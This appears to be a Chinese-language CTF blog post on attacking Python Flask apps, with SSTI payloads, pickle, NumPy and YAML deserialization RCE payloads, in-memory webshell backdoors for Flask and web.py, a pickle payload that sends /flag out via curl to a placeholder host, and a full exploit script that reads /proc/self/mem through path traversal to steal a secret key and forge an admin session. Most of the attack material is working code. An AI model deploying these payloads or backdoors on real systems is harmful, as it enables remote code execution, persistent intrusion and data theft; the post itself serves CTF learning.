{{(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read()}}&a=__globals__&b=os&c=cat /flag

寻找可利用类

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
__class__            类的一个内置属性,表示实例对象的类。

__base__ 类型对象的直接基类

__bases__ 类型对象的全部基类,以元组形式,类型的实例通常没有属性

__mro__ 此属性是由类组成的元组,在方法解析期间会基于它来查找基类。

__subclasses__() 返回这个类的子类集合

__init__ 初始化类,返回的类型是function,通过此方法来调用 __globals__方法

__globals__ 使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。

__dic__ 类的静态函数、类函数、普通函数、全局变量以及一些内置的属性都是放在类的__dict__里

__getattribute__() 实例、类、函数都具有的__getattribute__魔术方法。事实上,在实例化的对象进行.操作的时候(形如:a.xxx/a.xxx()),都会自动去调用__getattribute__方法。因此我们同样可以直接通过这个方法来获取到实例、类、函数的属性。

__getitem__() 调用字典中的键值,其实就是调用这个魔术方法,比如a['b'],就是a.__getitem__('b')

__builtins__ 这里 __builtins__ 是内建名称空间,是这个模块本身定义的一个名称空间,在这个内建名称空间中存在一些我们经常用到的内置函数(即不需要导入包即可调用的函数)如:print()、str()还包括一些异常和其他属性。

__import__ 动态加载类和函数,也就是导入模块,经常用于导入os模块,

__str__() 返回描写这个对象的字符串,可以理解成就是打印出来。

url_for flask的一个方法,可以用于得到__builtins__,而且url_for.__globals__['__builtins__']含有current_app。

get_flashed_messages flask的一个方法,可以用于得到__builtins__,而且get_flashed_messages.__globals__['__builtins__']含有current_app。

lipsum flask的一个方法,可以用于得到__builtins__,而且lipsum.__globals__含有os模块:{{lipsum.__globals__['os'].popen('ls').read()}}

current_app 应用上下文,一个全局变量。

request.args.x1 get传参

request.values.x1 所有参数

request.cookies cookies参数

request.headers 请求头参数

request.form.x1 post传参 (Content-Type:applicaation/x-www-form-urlencoded或multipart/form-data)

request.data post传参 (Content-Type:a/b)

request.json post传json (Content-Type: application/json)

config 当前application的所有配置。

g {{g}}得到<flask.g of 'flask_ssti'>

ss17040510929592

读取配置信息

当一些代码执行、命令执行的函数被阻拦,重要信息可能就在config中

例如SECRET KEY

1
{{config}}

RCE中的沙盒逃逸

2024巅峰极客php_online

题目提供了源代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
from flask import Flask, request, session, redirect, url_for, render_template
import os
import secrets


app = Flask(__name__)
app.secret_key = secrets.token_hex(16)
working_id = []


@app.route('/', methods=['GET', 'POST'])
def index():
if request.method == 'POST':
id = request.form['id']
if not id.isalnum() or len(id) != 8:
return '无效的ID'
session['id'] = id
if not os.path.exists(f'/sandbox/{id}'):
os.popen(f'mkdir /sandbox/{id} && chown www-data /sandbox/{id} && chmod a+w /sandbox/{id}').read()
return redirect(url_for('sandbox'))
return render_template('submit_id.html')


@app.route('/sandbox', methods=['GET', 'POST'])
def sandbox():
if request.method == 'GET':
if 'id' not in session:
return redirect(url_for('index'))
else:
return render_template('submit_code.html')
if request.method == 'POST':
if 'id' not in session:
return 'no id'
user_id = session['id']
if user_id in working_id:
return 'task is still running'
else:
working_id.append(user_id)
code = request.form.get('code')
os.popen(f'cd /sandbox/{user_id} && rm *').read()
os.popen(f'sudo -u www-data cp /app/init.py /sandbox/{user_id}/init.py && cd /sandbox/{user_id} && sudo -u www-data python3 init.py').read()
os.popen(f'rm -rf /sandbox/{user_id}/phpcode').read()

php_file = open(f'/sandbox/{user_id}/phpcode', 'w')
php_file.write(code)
php_file.close()

result = os.popen(f'cd /sandbox/{user_id} && sudo -u nobody php phpcode').read()
os.popen(f'cd /sandbox/{user_id} && rm *').read()
working_id.remove(user_id)

return result


if __name__ == '__main__':
app.run(debug=False, host='0.0.0.0', port=80)

我们关注这个下面代码所示部分,这个部分较为核心

简单分析代码,可知可以使用一个8位的用户名创建一个沙盒,并在沙盒中用nobody(linux系统中的一个用户)这个低权限用户来执行php代码

1
2
3
4
5
6
7
8
9
10
11
12
13
working_id.append(user_id)
code = request.form.get('code')
os.popen(f'cd /sandbox/{user_id} && rm *').read()
os.popen(f'sudo -u www-data cp /app/init.py /sandbox/{user_id}/init.py && cd /sandbox/{user_id} && sudo -u www-data python3 init.py').read()
os.popen(f'rm -rf /sandbox/{user_id}/phpcode').read()

php_file = open(f'/sandbox/{user_id}/phpcode', 'w')
php_file.write(code)
php_file.close()

result = os.popen(f'cd /sandbox/{user_id} && sudo -u nobody php phpcode').read()
os.popen(f'cd /sandbox/{user_id} && rm *').read()
working_id.remove(user_id)

待更新

反序列化

Pickle反序列化

OPCODE

V0版本的opencode

指令 描述 具体写法 栈上的变化
c 获取一个全局对象或import一个模块 c[module]\n[instance]\n 获得的对象入栈
o 寻找栈中的上一个MARK,以之间的第一个数据(必须为函数)为callable,第二个到第n个数据为参数,执行该函数(或实例化一个对象) o 这个过程中涉及到的数据都出栈,函数的返回值(或生成的对象)入栈
i 相当于c和o的组合,先获取一个全局函数,然后寻找栈中的上一个MARK,并组合之间的数据为元组,以该元组为参数执行全局函数(或实例化一个对象) i[module]\n[callable]\n 这个过程中涉及到的数据都出栈,函数返回值(或生成的对象)入栈
N 实例化一个None N 获得的对象入栈
S 实例化一个字符串对象 S’xxx’\n(也可以使用双引号、'等python字符串形式) 获得的对象入栈
V 实例化一个UNICODE字符串对象 Vxxx\n 获得的对象入栈
I 实例化一个int对象 Ixxx\n 获得的对象入栈
F 实例化一个float对象 Fx.x\n 获得的对象入栈
R 选择栈上的第一个对象作为函数、第二个对象作为参数(第二个对象必须为元组),然后调用该函数 R 函数和参数出栈,函数的返回值入栈
. 程序结束,栈顶的一个元素作为pickle.loads()的返回值 .
( 向栈中压入一个MARK标记 ( MARK标记入栈
t 寻找栈中的上一个MARK,并组合之间的数据为元组 t MARK标记以及被组合的数据出栈,获得的对象入栈
) 向栈中直接压入一个空元组 ) 空元组入栈
l 寻找栈中的上一个MARK,并组合之间的数据为列表 l MARK标记以及被组合的数据出栈,获得的对象入栈
] 向栈中直接压入一个空列表 ] 空列表入栈
d 寻找栈中的上一个MARK,并组合之间的数据为字典(数据必须有偶数个,即呈key-value对) d MARK标记以及被组合的数据出栈,获得的对象入栈
} 向栈中直接压入一个空字典 } 空字典入栈
p 将栈顶对象储存至memo_n pn\n
g 将memo_n的对象压栈 gn\n 对象被压栈
0 丢弃栈顶对象 0 栈顶对象被丢弃
b 使用栈中的第一个元素(储存多个属性名: 属性值的字典)对第二个元素(对象实例)进行属性设置 b 栈上第一个元素出栈
s 将栈的第一个和第二个对象作为key-value对,添加或更新到栈的第三个对象(必须为列表或字典,列表以数字作为key)中 s 第一、二个元素出栈,第三个元素(列表或字典)添加新值或被更新
u 寻找栈中的上一个MARK,组合之间的数据(数据必须有偶数个,即呈key-value对)并全部添加或更新到该MARK之前的一个元素(必须为字典)中 u MARK标记以及被组合的数据出栈,字典被更新
a 将栈的第一个元素append到第二个元素(列表)中 a 栈顶元素出栈,第二个元素(列表)被更新
e 寻找栈中的上一个MARK,组合之间的数据并extends到该MARK之前的一个元素(必须为列表)中 e MARK标记以及被组合的数据出栈,列表被更新
序列化

(打印的序列化pickle数据并未包含rce部分)

1
2
3
4
5
6
7
8
9
10
import pickle

class Student():
a = 'asd'
b = 123

a = new Student()
payload = pickle.dumps(a)

print(payload)

ss16751031578193

反序列化

(payload已经过修改)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import pickle

class Student():
a = 'asd'
b = 123

payload = b'''c__main__
Student
)\x81}(V__setstate__
cos
system
ubVwhoami
b.'''

pickle.loads(payload)

ss17860602667575

全局变量覆盖

未完待更

R指令RCE
1
2
3
4
b'''(cos
system
S'whoami'
R.'''
i指令RCE
1
2
3
4
b'''(S"whoami"
ios
system
.'''
o指令RCE
1
2
3
4
b'''(cos
system
S'whoami'
o.'''
b指令RCE
1
2
3
4
5
6
7
b'''c__main__
Student
)\x81}(V__setstate__
cos
system
ubVwhoami
b.'''

RCE的前提是有Student类

1
2
3
class Student():
a = 'asd'
b = 123

Numpy RCE漏洞

NumPy 可以通过load方法加载 NumPy 二进制文件和 pickles

默认 NumPy 二进制文件格式会有 ZIP 的魔术头PK\x03\x04PK\x05\x06

如果不满足默认的格式,且设置了allow_pickle为True则会执行 pickle.load()方法

本质上还是pickle反序列化,可以运行以下程序生成payload, 生成test.bin

[cmd]处替换为你想执行的命令

1
2
3
4
5
6
7
8
9
10
11
12
13
import pickle
import os

class Test(object):
def __init__(self):
self.a = 1
def __reduce__(self):
return (os.system, ('[cmd]',))

if __name__ == '__main__':
tmpdaa = Test()
with open("test.bin",'wb') as f:
pickle.dump(tmpdaa,f)

然后使用numpy加载即可RCE, 注意需要设置allow_pickle=True

1
2
import numpy as np
np.load(f'test.bin', allow_pickle=True)
强网杯2022-crash

仅过滤了R指令

此题由于过滤了secret不能直接变量覆盖,但是可以通过代码执行来进行变量覆盖

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#.............
# 其它部分已省略
import admin
#.............
# 其它部分已省略
app.secret_key=random.randbytes(12)

class User:
def __init__(self, username,password):
self.username=username
self.token=hash(password)

def get_password(username):
if username=="admin":
return admin.secret
else:
return session.get("password")

@app.route('/balancer', methods=['GET', 'POST'])
def flag():
pickle_data=base64.b64decode(request.cookies.get("userdata"))
if b'R' in pickle_data or b"secret" in pickle_data:
return "You damm hacker!"
os.system("rm -rf *py*")
userdata=pickle.loads(pickle_data)
if userdata.token!=hash(get_password(userdata.username)):
return "Login First"
if userdata.username=='admin':
return "Welcome admin, here is your next challenge!"
return "You're not admin!"

#.............
# 其它部分已省略

(1)构造代码执行进行变量覆盖(i指令)

使用exec(类似eval)

1
2
3
4
b'''(S'exec('admin.se'+'cret="aaaa"')'
i__builtin__
exec
.'''

(2)直接命令执行(i指令)

使用os.system

1
2
3
4
b'''(S"curl xxx.xxxx/?=`cat /flag`"
ios
system
.'''

YAML反序列化

基本的程序
1
2
3
4
5
6
7
8
import yaml

payload = '''!!python/object/new:bytes
- !!python/object/new:map
- !!python/name:eval
- ["__import__('os').popen('whoami"]'''

yaml.load(payload)
1
2
3
4
5
6
import yaml


payload = b"""!!python/object/new:subprocess.check_output [["whoami"]]"""

yaml.load(payload.decode("utf-8"), Loader=yaml.Loader)

其它

Flask的内存马等

Flask的内存马适用于pickle反序列化、SSTI等能够达成代码执行,但题目不出网或无回显的情况

参考链接:

总的来说就是通过获取app对象,使用app对象中的add_url_rule方法添加能够RCE的后门路由达到内存马的效果

首先从sys.modules中获取app对象(sys.modules是一个全局字典,该字典是python启动后就加载在内存中)

1
getApp = sys.modules['__main__'].__dict__['app']

获取APP对象后就能操作当前Flask APP的配置了,

在无回显、不出网的前提下,为了获取RCE回显,此时有四条路可选

  1. 打开Flask的Debug模式,抛出Exception来回显
1
2
import sys
sys.modules['__main__'].__dict__['app'].debug=True

例如pickle反序列化代码执行的情况下使用异常信息来回显

1
2
3
4
class genpoc(object):
def __reduce__(self):
s = "raise Exception(__import__('os').popen('ls /').read())" # 要执行的命令
return exec, (s,) # reduce函数必须返回元组或字符串

  1. 关闭Flask的Debug模式,实现一个内存马(通过add_url_rule方法)
1
2
3
import sys
sys.modules['__main__'].__dict__['app'].debug=False
sys.modules['__main__'].__dict__['app'].add_url_rule('/shell','shell',lambda :__import__('os').popen('ls /').read())

  1. 设置Flask的静态文件目录为/tmp,通过>写命令执行结果
1
2
3
4
import sys
sys.modules['__main__'].__dict__['app'].static_url_path='/static'
sys.modules['__main__'].__dict__['app'].static_folder='/tmp/'
__import__('os').popen('ls / > /tmp/test').read()

执行结果

  1. 时间盲注,命令执行配合sleep逐字符判断,例如如下命令

假设flag是abcd,如果第一个字符为a则会执行sleep 3延时三秒,否则不执行sleep 3

1
echo 'abcd' | cut -b 1 | grep a && sleep 3

执行结果1


Web.py内存马

感谢NepNep的someb0dy师傅提供的思路,这里顺便记录一下web.py的内存马的实现方法

web.py中可以通过add_processor方法实现一个拦截器,调用handler()即为获取拦截前的路由的结果

1
2
3
4
5
6
7
def my_processor(handler):
print("before handling")
result = handler()
print("after handling")
return result

app.add_processor(my_processor)

当后端为web.py时的内存马实现方法如下

1
2
3
4
5
6
7
8
9
import sys
def hello(handler):
import subprocess
params = web.input()
cmd = params.cmd
output = subprocess.check_output(cmd, shell=True).decode('utf-8')
return output
app = sys.modules['__main__'].__dict__['app']
app.add_processor(hello)

Cat cat

这题是我给CatCTF 2022出的题,

因为看了蓝帽杯2022初赛的Web-file_session觉得很有意思所以就参考了一下(ε=ε=ε=┏(゜ロ゜;)┛


提供docker-compose等文件:https://blog.lxscloud.top/static/post/CTF_Python_Flask/catcat/cat_cat.zip

若想要直接复现可以到我的CTF平台:https://ctfm.lxscloud.top/category/test/challenge/13

同时提供exp文件下载(Python3.6以上):https://blog.lxscloud.top/static/post/CTF_Python_Flask/catcat/getFlag.py

题目首页

进入题目首页可得以下界面

截图1

尝试点击绿色文字可以跳转到如下页面,可以猜测可能存在任意文件读取

截图2

尝试读取系统文件

检测是否能任意文件读取,读取/etc/passwd成功

截图3

读取源码

先读取cmdline获取源码文件名

截图4

通过../app.py读取源码

截图5

上图读出来的源码很乱,但由前面b开头可知这是python中的bytes类型

可以直接使用bytes的decode()方法获取格式化的源码,如下

1
2
a = b'abc\nabc'
print(a.decode())

截图6

获取源码如下

截图7

app.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
import os
import uuid
from flask import Flask, request, session, render_template, Markup
from cat import cat

flag = ""
app = Flask(
__name__,
static_url_path='/',
static_folder='static'
)
app.config['SECRET_KEY'] = str(uuid.uuid4()).replace("-", "") + "*abcdefgh"
if os.path.isfile("/flag"):
flag = cat("/flag")
os.remove("/flag")

@app.route('/', methods=['GET'])
def index():
detailtxt = os.listdir('./details/')
cats_list = []
for i in detailtxt:
cats_list.append(i[:i.index('.')])

return render_template("index.html", cats_list=cats_list, cat=cat)



@app.route('/info', methods=["GET", 'POST'])
def info():
filename = "./details/" + request.args.get('file', "")
start = request.args.get('start', "0")
end = request.args.get('end', "0")
name = request.args.get('file', "")[:request.args.get('file', "").index('.')]

return render_template("detail.html", catname=name, info=cat(filename, start, end))



@app.route('/admin', methods=["GET"])
def admin_can_list_root():
if session.get('admin') == 1:
return flag
else:
session['admin'] = 0
return "NoNoNo"



if __name__ == '__main__':
app.run(host='0.0.0.0', debug=False, port=5637)

代码审计

从源码可知Python3程序,使用了Flask框架

审计app.py

flag部分

首先关注含有flag的部分,以下代码可知程序一启动就读取并删除flag文件

1
2
3
if os.path.isfile("/flag"):
flag = cat("/flag")
os.remove("/flag")

关注到admin路由可以获取flag,但是需要完成session伪造

需要伪造内容为{"admin" : 1}的session,则需要获取secret key

1
2
3
4
5
6
7
@app.route('/admin', methods=["GET"])
def admin_can_list_root():
if session.get('admin') == 1:
return flag
else:
session['admin'] = 0
return "NoNoNo"

secret key部分如下,是生成一个uuid然后去除-再拼接*abcdefgh组成的

1
app.config['SECRET_KEY'] = str(uuid.uuid4()).replace("-", "") + "*abcdefgh"
文件读取部分

可以看到任意文件读取功能是info路由提供的,

注意到可控参数有三个,分别是file,start和end

还注意到其中有个cat函数

1
2
3
4
5
6
7
8
@app.route('/info', methods=["GET", 'POST'])
def info():
filename = "./details/" + request.args.get('file', "")
start = request.args.get('start', "0")
end = request.args.get('end', "0")
name = request.args.get('file', "")[:request.args.get('file', "").index('.')]

return render_template("detail.html", catname=name, info=cat(filename, start, end))

分析源码可知cat函数由cat.py提供

1
from cat import cat

审计cat.py

使用同样的方法读取cat.py的源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
import os, sys, getopt


def cat(filename, start=0, end=0)->bytes:
data = b''

try:
start = int(start)
end = int(end)

except:
start=0
end=0

if filename != "" and os.access(filename, os.R_OK):
f = open(filename, "rb")

if start >= 0:
f.seek(start)
if end >= start and end != 0:
data = f.read(end-start)

else:
data = f.read()

else:
data = f.read()

f.close()

else:
data = ("File `%s` not exist or can not be read" % filename).encode()

return data


if __name__ == '__main__':
opts,args = getopt.getopt(sys.argv[1:],'-h-f:-s:-e:',['help','file=','start=','end='])
fileName = ""
start = 0
end = 0

for opt_name, opt_value in opts:
if opt_name == '-h' or opt_name == '--help':
print("[*] Help")
print("-f --file File name")
print("-s --start Start position")
print("-e --end End position")
print("[*] Example of reading /etc/passwd")
print("python3 cat.py -f /etc/passwd")
print("python3 cat.py --file /etc/passwd")
print("python3 cat.py -f /etc/passwd -s 1")
print("python3 cat.py -f /etc/passwd -e 5")
print("python3 cat.py -f /etc/passwd -s 1 -e 5")
exit()

elif opt_name == '-f' or opt_name == '--file':
fileName = opt_value

elif opt_name == '-s' or opt_name == '--start':
start = opt_value

elif opt_name == '-e' or opt_name == '--end':
end = opt_value

if fileName != "":
print(cat(fileName, start, end))

else:
print("No file to read")
文件读取功能

cat.py功能比较简单,整段源码最重要的部分如下

下面代码的作用是读取文件并以bytes返回,观察可知可以设定读取位置(start、end)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
def cat(filename, start=0, end=0)->bytes:
data = b''

try:
start = int(start)
end = int(end)

except:
start=0
end=0

if filename != "" and os.access(filename, os.R_OK):
f = open(filename, "rb")

if start >= 0:
f.seek(start)
if end >= start and end != 0:
data = f.read(end-start)

else:
data = f.read()

else:
data = f.read()

f.close()

else:
data = ("File `%s` not exist or can not be read" % filename).encode()

return data
使用方法

使用方法如下

例如新建一个a.txt,内容如下

1
abcdefg

使用app.py读取a.txt,从第1个位置开始到第3个位置

1
python3 cat.py -s 1 -e 3 -f a.txt

截图8

解题

这题的关键点就是伪造session,从而访问admin路由获取flag

但伪造session需要获取secret key

获取secret key

这里可以利用python存储对象的位置在堆上这个特性,

app是实例化的Flask对象,而secret key在app.config['SECRET_KEY']

所以可以通过读取/proc/self/mem来读取secret key

读取堆栈分布

由于/proc/self/mem内容较多而且存在不可读写部分,直接读取会导致程序崩溃,

所以先读取/proc/self/maps获取堆栈分布

1
2
3
4
5
6
7
8
map_list = requests.get(url + f"info?file={bypass}/proc/self/maps")
map_list = map_list.text.split("\\n")
for i in map_list:
map_addr = re.match(r"([a-z0-9]+)-([a-z0-9]+) rw", i)
if map_addr:
start = int(map_addr.group(1), 16)
end = int(map_addr.group(2), 16)
print("Found rw addr:", start, "-", end)
读取对应位置内存数据

然后读取/proc/self/mem,读取对应位置的内存数据,

再使用正则表达式查找内容

1
2
3
4
5
res = requests.get(f"{url}/info?file={bypass}/proc/self/mem&start={start}&end={end}")
if "*abcdefgh" in res.text:
secret_key = re.findall("[a-z0-9]{32}\*abcdefgh", res.text)
if secret_key:
print("Secret Key:", secret_key[0])

伪造session

session伪造可以利用如下项目

1
https://github.com/noraj/flask-session-cookie-manager

查看选手wp也发现有选手不是通过admin路由获取flag的,

而是查找内存中的flag变量,然后将包含flag字符的内容保存下来,

最后通过strings配合grep查找

这样当然也行哈,我尝试了下选手的exp发现比较慢,但最终能获取flag

由于也是读mem,这题考点是读mem,所以不算非预期,

只是这种解法相较伪造session那种解法慢一些(我当时测题的时候内存数据没好好检测,没有读到flag哈哈哈哈哈)

截图17860607449540

一键获取flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
# coding=utf-8
#----------------------------------
###################################
#Edited by lx56@blog.lxscloud.top
###################################
#----------------------------------
import requests
import re
import ast, sys
from abc import ABC
from flask.sessions import SecureCookieSessionInterface


url = "http://"

#此程序只能运行于Python3以上
if sys.version_info[0] < 3: # < 3.0
raise Exception('Must be using at least Python 3')

#----------------session 伪造----------------
class MockApp(object):
def __init__(self, secret_key):
self.secret_key = secret_key

class FSCM(ABC):
def encode(secret_key, session_cookie_structure):
""" Encode a Flask session cookie """
try:
app = MockApp(secret_key)

session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
si = SecureCookieSessionInterface()
s = si.get_signing_serializer(app)

return s.dumps(session_cookie_structure)
except Exception as e:
return "[Encoding error] {}".format(e)
raise e
#-------------------------------------------



#由/proc/self/maps获取可读写的内存地址,再根据这些地址读取/proc/self/mem来获取secret key
s_key = ""
bypass = "../.."
#请求file路由进行读取
map_list = requests.get(url + f"info?file={bypass}/proc/self/maps")
map_list = map_list.text.split("\\n")
for i in map_list:
#匹配指定格式的地址
map_addr = re.match(r"([a-z0-9]+)-([a-z0-9]+) rw", i)
if map_addr:
start = int(map_addr.group(1), 16)
end = int(map_addr.group(2), 16)
print("Found rw addr:", start, "-", end)

#设置起始和结束位置并读取/proc/self/mem
res = requests.get(f"{url}/info?file={bypass}/proc/self/mem&start={start}&end={end}")
#如果发现*abcdefgh存在其中,说明成功泄露secretkey
if "*abcdefgh" in res.text:
#正则匹配,本题secret key格式为32个小写字母或数字,再加上*abcdefgh
secret_key = re.findall("[a-z0-9]{32}\*abcdefgh", res.text)
if secret_key:
print("Secret Key:", secret_key[0])
s_key = secret_key[0]
break

#设置session中admin的值为1
data = '{"admin":1}'
#伪造session
headers = {
"Cookie" : "session=" + FSCM.encode(s_key, data)
}
#请求admin路由
try:
flag = requests.get(url + "admin", headers=headers)
print("Flag is", flag.text)
except:
print("Something error")

getflag

写在最后

未完待更